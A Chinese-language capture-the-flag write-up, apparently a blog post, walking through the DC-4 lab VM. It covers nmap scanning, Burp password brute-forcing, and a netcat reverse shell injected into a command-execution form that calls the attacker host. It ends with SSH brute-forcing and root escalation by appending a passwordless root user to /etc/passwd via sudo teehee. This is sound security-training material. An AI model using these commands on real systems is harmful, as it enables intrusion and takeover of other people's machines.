DC-4

1.靶场搭建

 镜像地址:https://www.five86.com/dc-4.html

  Kali ip :192.168.1.162

  目标主机:192.168.1.105

然后导入Vmware即可。

2.信息搜集

用 arp-scan -l 扫描同网段的其他IP地址,从而得到目的主机的IP。

 

端口信息搜集

  使用到 nmap进行端口信息的搜集;

   nmap  -A -sV 192.168.1.105

 

 可见,该主机开启了80,22端口,对应http服务和ssh服务。

3.漏洞利用

  在浏览器中访问 192.168.1.105 ;浏览器页面会产生响应。

 

 是一个后台管理登录的弹框,用户名就是admin;因此,此处需要爆破出admin账号的密码。

最后,用burp的测试模块功能,使用字典爆破出密码为 happy。

于是,账号:admin;吗,密码:happy,就可登录后台。

 

 

登录后台,发现是一个可以执行命令的选项功能窗口。

根据以往经验,由于存在命令执行,便可在此处进行shell反弹;

抓包,修改数据;

radio=nc 192.168.1.162 1234 -e /bin/bash&submit=Run

 

修改之后,并且监听端口,nc -lvvp 1234;反弹shell

 

 

 

 然后用python打开一个标准的shell;这点不清楚为什么要这样说!

python -c 'import pty;pty.spawn("/bin/bash")'

 

 

 切换到home目录下,查看用户信息;

 

 ps:中途有错误,请忽略!

在这个目录下,存在一个.bak后缀的文件,这个是一个备份文件。

继续打开,是一些简单的经典密码;

 

 将以上历史密码保存下来,用户名为jim;开始ssh的爆破。

 

 得到用户名为 jim;密码为: jibril04;进行ssh登录;

 

 登录成功,并且提示 you have  mail;肯定有猫腻。

su root 无法进行权限的提升,提示密码错误。
果不其然,找到了这个秘密!

 

 

提权

切换用户为 charles;

 

 可以看到,teehee可以不使用密码就进行命令的执行;不妨试一试以这个来提权,前面也用到了docker进行提权,这个应该也可以。

查看帮助:

 

 使用命令可以将标准输入写入到指定文件中(以root权限写入文件内容);

既然可以以root权限写入任意文件信息,那么我们就可以利用各种骚操作进行提权了;

eg. 在 /etc/passwd/ 下写入一个具有 root 权限的新用户。

sudo teehee -aa /etc/passwd

aa::0:0:root:/root:/bin/bash

 

 总结:

1.使用teehee进行提权

2.hydra 工具爆破

 

posted @ 2021-10-08 21:11  MCY5  阅读(226)  评论(0编辑  收藏  举报